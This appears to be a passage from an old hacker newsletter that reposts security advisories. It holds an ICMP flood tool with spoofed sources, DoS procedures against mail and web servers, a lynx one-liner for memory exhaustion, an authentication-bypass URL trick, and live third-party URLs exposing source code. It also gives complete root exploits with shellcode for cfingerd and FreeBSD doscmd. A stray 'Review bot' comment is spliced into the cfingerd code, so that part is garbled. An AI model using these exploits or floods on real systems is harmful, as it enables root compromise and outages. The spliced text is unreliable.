} unsigned short in_cksum(addr, len) /* normal checksum */ u_short *addr; int len; { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *w++; nleft -= 2; } if (nleft == 1) { *(u_char *)(&answer) = *(u_char *)w; sum += answer; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return(answer); } int send_packet(int socket, unsigned long spoof_addr, struct sockaddr_in *dest_addr, long seq, int ty, int code) { unsigned char *packet; struct iphdr *ip; struct icmphdr *icmp; int rc; #ifdef DEBUG printf("type: %d code: %d\n", ty, code); #endif srandom((getpid()+time(NULL)+seq)); packet = (unsigned char *)malloc(sizeof(struct iphdr) + sizeof(struct icmphdr) + 8); ip = (struct iphdr *)packet; icmp = (struct icmphdr *)(packet + sizeof(struct iphdr)); memset(ip,0,sizeof(struct iphdr) + sizeof(struct icmphdr) + 8); ip->ihl = 5; ip->version = 4; ip->id = htons(random()*(seq*getpid()*3)); ip->frag_off = 0; ip->tot_len = strlen(packet); ip->ttl = 255; ip->protocol = IPPROTO_ICMP; ip->saddr = random()+ty+getpid(); ip->daddr = dest_addr->sin_addr.s_addr; ip->check = in_cksum(ip, sizeof(struct iphdr)); icmp->type = ty; icmp->code = code; /* 3(unreach): cycle 0-9 5(redirect): cycle 0-3 11(time_exceed): cycle 0-1 */ icmp->checksum = in_cksum(icmp,sizeof(struct icmphdr) + 1); if (sendto(socket, packet, sizeof(struct iphdr) + sizeof(struct icmphdr) + 1,0, (struct sockaddr *)dest_addr, sizeof(struct sockaddr)) == -1) { perror("sendto"); exit(0); } free(packet); return(0); } int main(int argc, char *argv[]) { struct sockaddr_in dest_addr; unsigned int i, x, s, sock; unsigned long src_addr; char owner[10]; strcpy(owner, "t"); strcat(owner, "h"); strcat(owner, "e"); strcat(owner, " "); strcat(owner, "p"); strcat(owner, "u"); strcat(owner, "b"); strcat(owner, "l"); strcat(owner, "i"); strcat(owner, "c"); if(argc < 2) { usage(argv[0], owner); exit(0); } if((sock = socket(AF_INET, SOCK_RAW, 
IPPROTO_RAW)) < 0) { fprintf(stderr,"ERROR: Opening raw socket. (need UID 0)\n"); return(-1); } if (resolver(argv[1],0,&dest_addr) == -1) { fprintf(stderr, "Cannot resolve destination\n"); exit(0); } src_addr = dest_addr.sin_addr.s_addr; for (s = 0;s <= atoi(argv[2]) || (atoi(argv[2]) == 0);s++) { for (i = 0;i < 18;i++) { switch(i) { case 3: /* cycle 0-9 */ for (x=0; x<=9; ++x) send_packet(sock, src_addr, &dest_addr, counter, i, x); break; case 5: /* cycle 0-3 */ for (x=0; x<=3; ++x) send_packet(sock, src_addr, &dest_addr, counter, i, x); break; case 11: /* cycle 0-1 */ for(x=0;x<=1;++x) send_packet(sock, src_addr, &dest_addr, counter, i, x); break; default: /* just use 0 =) */ send_packet(sock, src_addr, &dest_addr, counter, i, 0); } ++counter; } } } -- END twinge.c -- @HWA 163.0 SpiderMap 0.1 Released ~~~~~~~~~~~~~~~~~~~~~~ BUGTRAQ Announcement I have been sitting on this for almost six months and figured it may interest some of the users here... To quote the README: Spidermap is a collection of perl scripts which enable you to launch precisely tuned network scans. The goal of this project is to create an integrated suite of tools for low-impact network reconnaisance with features including custom packet rates and scan types for each network with increased efficiency by mapping multiple networks in parallel. The target users are system administrators and network security professionals seeking a non-destructive way to inventory network services and do so in a resaonable amount of time. You can find the latest code and more information at http://www.secureaustin.com/spidermap [ spidermap readme ] (Updated February 10, 2000) [1] (Overview of SpiderMap) Spidermap is a collection of perl scripts which enable you to launch precisely tuned network scans. 
The goal of this project is to create an integrated suite of tools for low-impact network reconnaissance with features including custom packet rates and scan types for each network with increased efficiency by mapping multiple networks in parallel. The target users are system administrators and network security professionals seeking a non-destructive way to inventory network services and do so in a reasonable amount of time.

[2] (Components)

There are 3 major components of the spidermap toolkit:

< breakdown
This script takes a list of ip addresses in as input and then prompts the user for specific information about each network. The output is fed into the actual scanning engine. This allows scans to be predefined for specific tasks. To see the usage, execute 'perl breakdown -h'.

< spidermap
The core of the toolkit, this script reads in a configuration file generated by breakdown, performs the scans, and dumps the raw output to a file for use by the createdb script. Check out the various options with 'perl spidermap -h'.

< nlogdb
The nlogdb script reads in the raw nmap output from spidermap and turns it into a flat-file database in the same format as Nlog. This flat-file pipe delimited database can be used for whatever purpose you can think of, whether scheduled network analysis or the input for another set of tools.

[3] (Examples)

To do anything you must create a list of target addresses. This can be accomplished by any of a number of ways:

< Nmap ping scan of your target network.
nmap -sP -PB1027 -g80 192.168.10.0/24 -m - | grep "Status: Up" | awk '{print $2}' > target.list

< DNS zone transfer:
host -l example.com | grep "has address" | awk '{ print $4 }' | sort -u > target.list

You then feed this list of addresses to the breakdown script, specify any defaults or the -auto option on the command line for non-interactive configuration.
< Interactive Configuration
perl breakdown -i target.list -o target.conf -c C

< Automatic Configuration
perl breakdown -i target.list -o target.conf -c C -p 21,22,23,25,53,79,80,110-113,139,443 -s S -auto

Now either save this configuration file for future use or start the scan now:

perl spidermap -i target.conf -o target.log -sp 20,53,80,443

This should calculate the number of packets per minute sent out based on your settings and ask you to hit enter to continue. I plan on adding a non-interactive option later on. The script will start launching multiple nmap processes in parallel, giving you some feedback on the console while it scans. After the scan completes, you need to do something with the output. The createdb tool takes this output and puts it into a flat-file pipe delimited text database.

perl nlogdb target.log target.db

[4] (ToDo)

These scripts are still very primitive and I am sure they still have a few major bugs in them. Perl and multiple nmap processes is a very kludgey way of accomplishing the project goal, but until I have enough time or enough people express interest it makes a usable prototype. Below are the known issues:

The spidermap script launches all the processes at once instead of spacing them out over the one minute interval. This kind of defeats the stealth option since the fast flood of packets makes it stand out. The exception being if you used decoys and set the packet rate to 1 for each network.

Find a better method of parallel scanning. I don't have the time to rewrite nmap...
BTW: Yes I know there is some "thought charting software" out there by the same name, I really don't care ;)

-HD (hdm@secureaustin.com / http://www.secureaustin.com)

@HWA

164.0 Windows Api SHGetPathFromIDList Buffer Overflow
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Packetstorm:

Windows Api SHGetPathFromIDList Buffer Overflow

To all those people who sent email to us asking for more information about the SHGetPathFromIDList Windows Api overflow: here is a more specific description of the problem. Any structure length or string length field can be modified or altered and cause whatever handles the shortcut to crash.

SHGetPathFromIDList

Converts an item identifier list to a file system path.

BOOL SHGetPathFromIDList(
    LPCITEMIDLIST pidl,
    LPSTR pszPath
);

Parameters

pidl
    Address of an item identifier list that specifies a file or directory location relative to the root of the namespace (the desktop).

pszPath
    Address of a buffer to receive the file system path. This buffer must be at least MAX_PATH characters in size.

Return Values

Returns TRUE if successful, or FALSE otherwise.

Disassembly of a hypothetical shortcut file

Offset  Bytes                     Contents

Header
0000    4C 00 00 00               'L'  Magic value
0004    01 04 02 00               GUID of shortcut files
        00 00 00 00
        C0 00 00 00
        00 00 00 46
0014    3F 00 00 00               Flags:
                                    Has item id list
                                    Target is a file
                                    Has description string
                                    Has relative pathname
                                    Has a working directory
                                    Has a custom icon
0018    20 00 00 00               File attributes: Archive
001C    C0 0E 82 D5 C1 20 BE 01   Time 1
0024    00 08 BF 46 D5 20 BE 01   Time 2
002C    00 47 AA EC EC 15 BE 01   Time 3
0034    A0 86 00 00               File length is 34464 bytes (86A0h)
0038    05 00 00 00               Icon number 5
003C    01 00 00 00               Normal window
0040    46 06 00 00               Ctrl-Alt-F hotkey
0044    00 00 00 00               Always zero, unknown/reserved
0048    00 00 00 00               Always zero, unknown/reserved

Item Id List
004C    2A 00                     Size of item id list

First item
004E    28 00                     Length of first item
0050    32 00                     ???
0052    A0 86 00 00               File length
0056    76 25 71 3E               ???
005A    20 00                     File attributes?
005C    62 65 73 74 5F 37         "best_773.mid"  Long name
        37 33 2E 6D 69 64 00      Null terminator
0069    42 45 53 54 5F 37         "BEST_773.MID"  Short name
        37 33 2E 4D 49 44 00      Null terminator

Last item
0076    00 00                     Zero length value

File location info
0078    74 00 00 00               Structure length
007C    1C 00 00 00               Offset past last item in structure
0080    03 00 00 00               Flags: Local volume, Network volume
0084    1C 00 00 00               Offset of local volume table
0088    34 00 00 00               Offset of local path string
008C    40 00 00 00               Offset of network volume table
0090    5F 00 00 00               Offset of final path string

Local volume table
0094    18 00 00 00               Length of local volume table
0098    03 00 00 00               Fixed disk
009C    D0 07 33 3A               Volume serial number 3A33-07D0
00A0    10 00 00 00               Offset to volume label
00A4    44 52 49 56 45 20 43 00   "DRIVE C",0
00AC    43 3A 5C 57 49 4E         "C:\WINDOWS\"  local path string
        44 4F 57 53 5C 00

Network volume table
00B8    1F 00 00 00               Length of network volume table
00BC    02 00 00 00               ???
00C0    14 00 00 00               Offset of share name
00C4    00 00 00 00               ???
00C8    00 00 02 00               ???
00CC    5C 5C 4A 45 53 53         "\\JESSE\WD",0  Share name
        45 5C 57 44 00
00D7    44 65 73 6B 74 6F         "Desktop\best_773.mid",0  Final path name
        70 5C 62 65 73 74
        5F 37 37 33 2E 6D
        69 64 00

Description string
00EC    12 00                     Length of string
00EE    42 65 73 74 20 37         "Best 773 midi file"
        37 33 20 6D 69 64
        69 20 66 69 6C 65

Relative path
0100    0E 00                     Length of string
0102    2E 5C 62 65 73 74         ".\best_773.mid"
        5F 37 37 33 2E 6D
        69 64

Working directory
0114    12 00                     Length of string
0116    43 3A 5C 57 49 4E         "C:\WINDOWS\Desktop"
        44 4F 57 53 5C 44
        65 73 6B 74 6F 70

Command line arguments
0128    06 00                     Length of string
012A    2F 63 6C 6F 73 65         "/close"

Icon file
0130    16 00                     Length of string
0132    43 3A 5C 57 49 4E         "C:\WINDOWS\Mplayer.exe"
        44 4F 57 53 5C 4D
        70 6C 61 79 65 72
        2E 65 78 65

Ending stuff
0148    00 00 00 00               Length 0 - no more stuff

The target is located at: C:\WINDOWS\Desktop\best_773.mid
The windows directory is shared as: \\JESSE\WD

Note: This overflow does not work under win2k

u n d e r g r o u n d  s e c u r i t y  s y s t e m s  r e s e a r c h
http://www.ussrback.com

@HWA

165.0 Anywhere Mail Server Ver.3.1.3 Remote DoS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Packetstorm:

Hello,

I've reported DoS problems on Internet Anywhere Mail Server Ver.3.1.3 to support@tnsoft.com on 3rd Dec, 99. They started to develop the fix. But they said "we'll release the fix in couple of weeks" three times. I've discussed with Jeff Moll (President of True North Software, Inc.) and he allowed me to post these vulnerabilities.

1. RETR DoS in POP service

+OK POP3 Welcome to somewhere.domain using the Internet Anywhere Mail Server Version: 3.1.3. Build: 1065 by True North Software, Inc.
USER yellow
+OK valid
PASS pikapika
+OK Authorized
RETR 111111111111111111111111

That's all.
The server could be dead a little bit after atoi(). They should check the return value of atoi().

2. Multiple connections to port 25 DoS

This is a simple game, too. Too many connect()s, about 3000, then you will see connection refused. After that, too many connect()s again, about 800, then you can't connect anymore. It depends on memory size (I tested on 128MB RAM, total 256MB). They should check connection status.

Moderator of BUGTRAQ-JP <Nobuo Miwa> n-miwa@lac.co.jp
http://www.lac.co.jp/security/

@HWA

166.0 .ASP error shows full source code to caller
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

.ASP = Active Server Pages (Microsoft)

Packetstorm:

Forwarded with permission of the author. Please direct all replies to jwalsh@jwsg.com.

Ben Greenbaum
Director of Site Content
Security Focus
http://www.securityfocus.com

---------- Forwarded message ----------

Description:
============

Active server pages (ASP) with runtime errors expose a security hole that publishes the full source code name to the caller. If these scripts are published on the internet before they are debugged by the programmer, the major search engines index them. These indexed ASP pages can then be located with a simple search. The search results publish the full path and file name for the ASP scripts. This URL can be viewed in a browser and may reveal full source code with details of business logic, database location and structure.

Procedure:
==========

- In the Altavista search engine execute a search for +"Microsoft VBScript runtime error" +".inc, "
- Look for search results that include the full path and filename for an include (.inc) file.
- Append the include filename to the host name and call this up in a web browser.
Example: www.rodney.com/stationery/browser.inc

Examples:
=========

http://shopping.altavista.com/inc/lib/prep.lib
    Exposes database connections and properties, resource locations, cookie logic, server IP addresses, business logic
http://www.justshop.com/SFLib/ship.inc
    Exposes database properties, business logic
http://www.bbclub.com:8013/includes/general.inc
    Exposes cobranding business logic
http://www.salest.com/corporate/admin/include/jobs.inc
    Exposes datafile locations and structure
http://www.bjsbabes.com/SFLib/design.inc
    Exposes source code for StoreFront 2000 including database structure
http://www.ffg.com/scripts/IsSearchEngine.inc
    Exposes search engine log
http://www.wcastl.com/include/functions.inc
    Exposes members' email addresses and private comments file http://www.wcastl.com/flat/comments.txt
http://www.traveler.net/two/cookies.inc
    Exposes cookie logic

Resolution:
===========

- Search engines should not index pages that have ASP runtime errors.
- Programmers should fully debug their ASP scripts before publishing them on the web.
- Security administrators need to secure the ASP include files so that external users can not view them.

===========================
Jerry Walsh
JW's Software Gems
Email jwalsh@jwsg.com
Phone (949) 855-0233
Website http://www.jwsg.com
===========================

@HWA

167.0 Bypassing authentication on Axis 700 Network Scanner
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Packetstorm:

Infosec Security Vulnerability Report
No: Infosec.20000207.axis700.a
=====================================

Vulnerability Summary
---------------------

Problem:  Bypassing authentication on Axis 700 Network Scanner. By modifying a URL, outsiders can access administrator URLs without entering username and password.
Threat:   Unauthorized access.
Platform: Axis 700 Network Scanner Server (Software Version 1.12)
Solution: None? See below.

Vulnerability Description
-------------------------

User pages are located under http://server/user/.
The URL to the configuration page is:

http://server/admin/this_axis700/this_axis700.shtml

This page is password protected. The actual configuration takes place on the pages linked from this page.

By changing the URL to:

http://server/user/../admin/this_axis700/this_axis700.shtml

an outsider gets access to the configuration page without entering username and password. The server seems to check access permissions before URL conversion.

The server also decodes %1u to %2e (not a vulnerability).

Solution
--------

<<Quote_from_Axis_Support
Hi,,
You will find the latest version on http://www.axis.se/techsup
Best Regards
XXXXXX XXXXXXX
Quote_from_Axis_Support>>

Nothing says that version 1.14 will fix this vulnerability.

Other information
-----------------

Infosec recommends everyone to try to access their authorized pages with URLs such as:

http://server/NonPrivPage/../PrivPage/

Infosec thanks weld at l0pht for the inspiration (http://www.l0pht.com/advisories/showcode.txt)

//Ian Vitek
ian.vitek@infosec.se

-------------------------------
Infosec is a Swedish-based tiger team that has worked with computer-related security since 1982 and done penetration tests and technical revisions since 1996. Infosec is now searching for co-workers. Call Blume on +46-8-6621070 for more information.

@HWA

168.0 Novell Bordermanager 3.0 through 3.5 is vulnerable to a slow DoS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Packetstorm:

The issue also affects BorderManager 3.0 (sp2) running on NetWare 4.11 sp6a. I was able to replicate the memory allocation error but have not had any luck with obtaining the high CPU utilisation. Again, csatpxy.nlm is loaded by default on this system and unloading it stopped the memory allocation errors.

matthew

-----Original Message-----
From: Chicken Man [mailto:chicknmon@HOTMAIL.COM]
Sent: Wednesday, 9 February 2000 11:59
Subject: Novell BorderManager 3.5 Remote Slow Death

On a (default) installation of BorderManager 3.5 sp1, spc02 running on NetWare 5.0 sp3a with nici 1.3.1, telnet to port 2000 on the firewall (on either the public or private interfaces) and hit enter a few times. Utilization will jump (to 67% on our systems), and the console will immediately report an error similar to the following:

1-27-2000 9:34:47 am: SERVER-5.0-830 [nmID=2000A] Short Term Memory Allocator is out of Memory. 1 attempts to get more memory failed.

The telnet session will not disconnect, unless you manually close the connection. Over the course of two days (every few minutes or so, YMMV) the error will repeat, with the number of attempts steadily increasing (by several million each time). Eventually (again, for us it was two days, YMMV) the firewall will deny all requests, and eventually crash completely.

Further symptoms: Using tcpcon you can see something listening on port 2000. If the telnet session has been closed from the remote end, tcpcon reports that the previous session is in a "closewait" state. It may be possible to do more bad things since this entry never clears automatically (i.e. use up the rest of system resources by opening and closing connections to this port). It can be cleared using tcpcon.

The misbehaving NLM is CSATPXY.NLM. It is the CS Audit Trail Proxy, which is apparently loaded by default on a BorderManager 3.5 install. From what various people tell me, it could also be installed on non-BorderManager Novell servers (though probably not by default), which means this vulnerability may extend beyond BorderManager 3.5.

Novell was contacted regarding this and the answer was "unload the NLM". Unloading the NLM does stop the slow death. Rebooting will reload the NLM so it must be taken out of whatever loads it on boot, of course.
<RANT>
Why is the port even accessible from the outside (or the inside for that matter)? The default BorderManager packet filtering rules indicate that pretty much everything is being passed. Why is the NLM loaded by default? Tcpcon shows various other services running that shouldn't be either (chargen, echo, etc). Why? What other vulnerabilities am I missing?
</RANT>

enjoy,
ChicknMon

@HWA

169.0 CERN 3.0A Heap overflow advisory
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Packetstorm:

#$%$#$%$#$%$#$%$#$%$#$%$#$%$#$%$#$%$#$%$#
$%   CERN 3.0A Heap overflow advisory   %$
#$%$#$%$#$%$#$%$#$%$#$%$#$%$#$%$#$%$#$%$#
$%            By Scrippie               %$
#$            Phreak.nl                 $#
$%$#$%$#$%$#$%$#$%$#$%$#$%$#$%$#$%$#$%$#$
#$     Love To: Maja, Dopey, Hester     $#
$%$#$%$#$%$#$%$#$%$#$%$#$%$#$%$#$%$#$%$#$

There is a heap overflow that wastes memory space in the CERN/3.0A webserver.

Offending source code file is: Daemon/Implementation/HTScript.c
Offending function is: PUBLIC int HTCallScript ARGS1(HTRequest *, req)

Offending code snippet:

    else {
        /* Try replacing unknown suffix with .pp */
        char *test = (char*)malloc(strlen(HTReqScript) + 4);
        char *s;

        CTRACE(stderr, "Trying...... to find executable by appending .pp\n");
        strcpy(test, HTReqScript);
        s = strrchr(test, '.');
        strcat(test, ".pp");    /* Try appending .pp */
        CTRACE(stderr, "Trying...... \"%s\"\n", test);
        if (-1==access(test, X_OK)) {   /* Then try replacing suffix with .pp */
            if (s) {
                *s = 0;
                strcat(s, ".pp");
                CTRACE(stderr, "Bad luck.... now trying \"%s\"\n", test);
                if (-1==access(test, X_OK)) {   /* INVALID */
                    if (!(msg = (char*)malloc(3*strlen(test) + 100)))
                        outofmem(__FILE__, "HTCallScript");
                    sprintf(msg,
                            "Bad script request -- none of '%s' and '%s.pp' is executable",
                            HTReqScript, test );
                    free(test);

So we see that test is malloced to hold HTReqScript + ".pp\0", after which HTReqScript is copied to test, the dot is located and .pp is appended.
We note that strcat() does not just append ".pp" to the string, but rather ".pp\0". Now, if the HTReqScript did contain a suffix, CERN will go and use the char pointer s to overwrite the suffix of HTReqScript. If the HTRequest with the new ".pp" suffix cannot be found we print an error message.

It seems CERN allocates 3*strlen(test) + 100 bytes for our error string... probably some 100 for our static string and the rest for HTReqScript and test. Sadly, the strcat on test will have limited the length of the test string, but NOT of HTReqScript, so making sure we have a lot of characters after our separating dot overflows the heap.

Consider an HTReqScript of 1 A, a dot and 50000 A's - now we get something like:

HTReqScript - somewhere around 50000 bytes (50003)
Test        - the same as HTReqScript + 4 (50007)

After putting ".pp\0" into place however in our test array we get:

strlen(test) - 1 A, 1 dot, pp - hmmm, 3 bytes

Now our msg will be: 3*3+100=109 - by far enough to hold test, but by far NOT enough to hold HTReqScript. Close to 50000 bytes of the heap will be ruined!

It's unlikely that this flaw is exploitable, since there is nothing on the heap after the malloced msg, but I'd sure like to hear any ideas.

/* Scrip kids DoS attack section */

iLikeDossing# lynx http://www.lart.org/cgi-bin/A.`perl -e 'print"A" x 50000'`

Repeat several times and see memory usage jump to remarkable heights :)

/* End of script kiddies section */

A lot of thanks go to dvorak for pointing out to me that most webservers seem to suffer some sort of flaw in their script parsing routines and for telling me to take a look at HTScript.c

A quick patch:

--- HTScript.back Wed Jan 26 22:18:44 2000
+++ HTScript.c Wed Jan 26 22:19:52 2000
@@ -894,7 +894,7 @@ strcat(s, ".pp"); CTRACE(stderr, "Bad luck.... now trying \"%s\"\n", test); if (-1==access(test, X_OK)) { /* INVALID */ - if (!(msg = (char*)malloc(3*strlen(test) + 100))) + if (!(msg = (char*)malloc(strlen(HTReqScript)+strlen(test) + 100))) outofmem(__FILE__, "HTCallScript"); sprintf(msg,

(Isn't a unified diff a beautiful thing :-)

A big hooray to: #phreak.nl
A lots of love to: Dopey, Maja, Hester
Thanks to: dvorak

Cheers,
Scrippie - ronald@grafix.nl

@HWA

170.0 Cfingerd 1.3.3 (*BSD) remote root buffer overflow exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Packetstorm:

/*
 * babcia padlina ltd. <babunia@freebsd.lublin.pl>
 * cfingerd 1.3.3 (*bsd) root sploit
 *
 * usage: adjust ptr until cfingerd will segfault with some random data on
 * output, now adjust ret.
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>

#define BUFFER_SIZE 80
#define ADDRS 190
#define PTR 0xbfbfd750
#define RET 0xbfbfd7d2
#define NOP 0x90
#define FILE1 "user.inf"
#define FILE2 "hack"
#define FILE3 "set.c"
#define SHELL "/tmp/sh"
#define FINGER 79
#define MAXLINE 1024
#define LOCALHOST 0x7f000001
#define GREEN "\E[1;32m"
#define RED "\E[1;31m"
#define NORM "\E[1;39m"
#define UNBOLD "\E[m"

void sh(sockfd)
int sockfd;
{
    char buf[MAXLINE];
    int c;
    fd_set rf, drugi;

    FD_ZERO(&rf);
    FD_SET(0, &rf);
    FD_SET(sockfd, &rf);

    while (1) {
        bzero(buf, MAXLINE);
        memcpy (&drugi, &rf, sizeof(rf));
        select(sockfd+1, &drugi, NULL, NULL, NULL);
        if (FD_ISSET(0, &drugi)) {
            c = read(0, buf, MAXLINE);
            send(sockfd, buf, c, 0x4);
        }
        if (FD_ISSET(sockfd, &drugi)) {
            c = read(sockfd, buf, MAXLINE);
            if (c<0) return;
            write(1,buf,c);
        }
    }
}

int connectto(void)
{
    int sockfd;
    char sendbuf[MAXLINE];
    struct sockaddr_in cli;

    bzero(&cli, sizeof(cli));
    cli.sin_family = AF_INET;
    cli.sin_addr.s_addr=htonl(LOCALHOST);
    cli.sin_port = htons(FINGER);

    if((sockfd =
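Review bot: the replacement allocation strlen(HTReqScript)+strlen(test)+100 now covers both '%s' arguments of the sprintf on the trailing context line, which the original 3*strlen(test)+100 did not once *s = 0 had shortened test, so this closes the overflow the advisory describes. The fixed text of the format string plus its terminator is well under the 100 bytes of slack, but nothing in the hunk ties the two together; suggest sizing the buffer from the format string itself, or switching the sprintf to snprintf with the same computed size, so a later wording change to the message cannot reintroduce the overflow.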
        socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        perror("socket");
        return -1;
    }

    if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0) {
        perror("connect");
        return -1;
    }

    sprintf(sendbuf, "%.1023s\n", getenv("LOGNAME"));
    write(sockfd, sendbuf, strlen(sendbuf));
    sleep(1);
    fflush(stdout);
    fflush(stderr);
    sh(sockfd);
    return;
}

int main(argc, argv)
int argc;
char **argv;
{
    char *buf1 = NULL, *buf2 = NULL, *p = NULL;
    u_long *addr_ptr = NULL;
    int noplen, i, bufsize = BUFFER_SIZE, addrs = ADDRS;
    int retofs = 0, ptrofs = 0;
    long ret, ptr;
    FILE *phile;

    char execshell[] =
        "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
        "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
        "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff"SHELL"\x01\x01\x01\x01"
        "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

    fprintf(stderr, "\n"GREEN"babcia padlina ltd. cfingerd local root exploit"NORM UNBOLD"\n\n");

    if(argc > 5) {
        bufsize = atoi(argv[1]);
        addrs = atoi(argv[2]);
        ptrofs = atoi(argv[3]);
        retofs = atoi(argv[4]);
    }

    if(!(buf1 = malloc(bufsize+1))) {
        perror("malloc()");
        return -1;
    }

    if(!(buf2 = malloc(addrs+1))) {
        perror("malloc()");
        return -1;
    }

    ret = RET + ptrofs;
    ptr = PTR + ptrofs;
    noplen = bufsize - strlen(execshell);
    memset(buf1, NOP, noplen);
    strcat(buf1, execshell);

    p = buf2;
    addr_ptr = (unsigned long *)p;
    for(i = 0; i < (addrs / 4) /2; i++)
        *addr_ptr++ = ptr;
    for(i = 0; i < (addrs / 4) /2; i++)
        *addr_ptr++ = ret;
    p = (char *)addr_ptr;
    *p = '\0';

    if ((phile = fopen(FILE1, "w")) == NULL) {
        perror("fopen()");
        return -1;
    }

    fprintf(stderr, GREEN "RET:" RED "0x%x\n" GREEN "PTR:" RED "0x%x%\n\n" GREEN "setting up..."
            NORM UNBOLD "\n", ret, ptr);

    fprintf(phile, "#Changing user database information for %s.\n"
                   "Shell: %s\n"
                   "Full Name: %s\n"
                   "Office Location: %s\n"
                   "Office Phone: \n"
                   "Home Phone: \n"
                   "Other information: \n",
            getenv("LOGNAME"), getenv("SHELL"), buf2, buf1);
    fclose(phile);

    if ((phile = fopen(FILE2, "w")) == NULL) {
        perror("fopen()");
        return -1;
    }
    fprintf(phile, "cat user.inf>\"$1\"\n");
    fprintf(phile, "touch -t 2510711313 \"$1\"\n");
    fclose(phile);

    if ((phile = fopen(FILE3, "w")) == NULL) {
        perror("fopen()");
        return -1;
    }
    // buffer is too small to execute seteuid/setegid there, so we have
    // to do this here.
    fprintf(phile, "main() { seteuid(getuid()); setegid(getgid()); system(\"id\"); execl(\"/bin/sh\", \"sh\", 0); }");
    fclose(phile);

    system("/usr/bin/cc -o " SHELL " " FILE3);
    unlink(FILE3);
    system("EDITOR=./" FILE2 ";export EDITOR;chmod +x " FILE2 ";chfn > /dev/null 2>&1");
    unlink(FILE1);
    unlink(FILE2);

    if (connectto() < 0)
        return -1;

    unlink(SHELL);
    return 0;
}

@HWA

171.0 FreeBSD 3.4-STABLE /usr/bin/doscmd local exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Packetstorm:

/*
 *
 * (c) 1999 babcia padlina ltd. <babunia@freebsd.lublin.pl>
 * FreeBSD 3.4-STABLE /usr/bin/doscmd exploit.
 *
 */

#include <stdio.h>
#include <sys/param.h>
#include <sys/stat.h>
#include <string.h>

#define NOP 0x90
#define BUFSIZE 1000
#define ADDRS 1200

long getesp(void)
{
    __asm__("movl %esp, %eax\n");
}

int main(argc, argv)
int argc;
char **argv;
{
    char *execshell =
        "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
        "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
        "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
        "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

    char *buf, *p;
    int noplen, i, ofs, align;
    long ret, *ap;
    FILE *fp;

    if(!(buf = (char *)malloc(BUFSIZE+1))) {
        perror("malloc()");
        return -1;
    }

    if (argc < 3) {
        fprintf(stderr, "usage: %s ofs align\n", argv[0]);
        exit(0);
    }

    ofs = atoi(argv[1]);
    align = atoi(argv[2]);

    noplen = BUFSIZE - strlen(execshell);
    ret = getesp() + ofs;

    memset(buf, NOP, noplen);
    buf[noplen+1] = '\0';
    strcat(buf, execshell);

    setenv("EGG", buf, 1);
    free(buf);

    if(!(buf = (char *)malloc(ADDRS+align+1))) {
        perror("malloc()");
        return -1;
    }

    memset(buf, 'a', align);
    p = &buf[align];
    ap = (unsigned long *)p;
    for(i = 0; i < ADDRS / 4; i++)
        *ap++ = ret;
    p = (char *)ap;
    *p = '\0';

    fprintf(stderr, "ret: 0x%x\n", ret);
    execl("/usr/bin/doscmd", "doscmd", buf, 0);
    return 0;
}

@HWA

172.0 FireWall-1 FTP Server Vulnerability Background Paper #1
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Packetstorm:

(Windows application attack)

PAPER

FireWall-1 FTP Server Vulnerability Background Paper #1, data protect AG

John McDonald <jm@dataprotect.com>
Thomas Lopatic <tl@dataprotect.com>

References
----------

Please reference the recent vuln-dev posting by Mikael Olsson entitled, "Breaking through FTP ALGs -- is it possible?" At the time of this writing, it was not yet archived on the security focus web site.

Introduction
------------

The basic idea of the described attack is to subvert the security policy implemented by a stateful firewall.
This is done by triggering the generation of a TCP packet that, when inspected by the firewall, will change the firewall's internal state such that an attacker is able to establish a TCP connection to a filtered port through the firewall. This packet is the server response to a PASV user request during an FTP session.

We have also come across this attack, and were in the process of preparing a more comprehensive advisory, including other FireWall-1 security issues we have documented. The idea was to notify Check Point of these problems and give them time to develop a software update. However, since the general form of this vulnerability was independently documented by Mikael Olsson and published to the vuln-dev mailing list, we feel it is appropriate to distribute this information now, as it relates specifically to FireWall-1, in order to alert potential victims to this issue.

Description
-----------

Check Point FireWall-1 is vulnerable to an attack involving the stateful support for the FTP protocol, specifically the handling of the PASV command. Typically, a user will send an FTP server the PASV command, and the response from the FTP server will be the 227 message specifying to which destination IP address and destination port the client is expected to connect for the next data connection.

FireWall-1 monitors the packets sent from the FTP server to the client, looking for the string "227 " at the beginning of each packet. Upon a match, FireWall-1 will extract the destination IP address and the destination port given in the packet payload, verify that the specified IP address corresponds to the source address of the packet, and allow an incoming TCP connection through the firewall according to the destination IP address and the destination port extracted from the datagram. There are several restrictions on this connection which limit its utility.
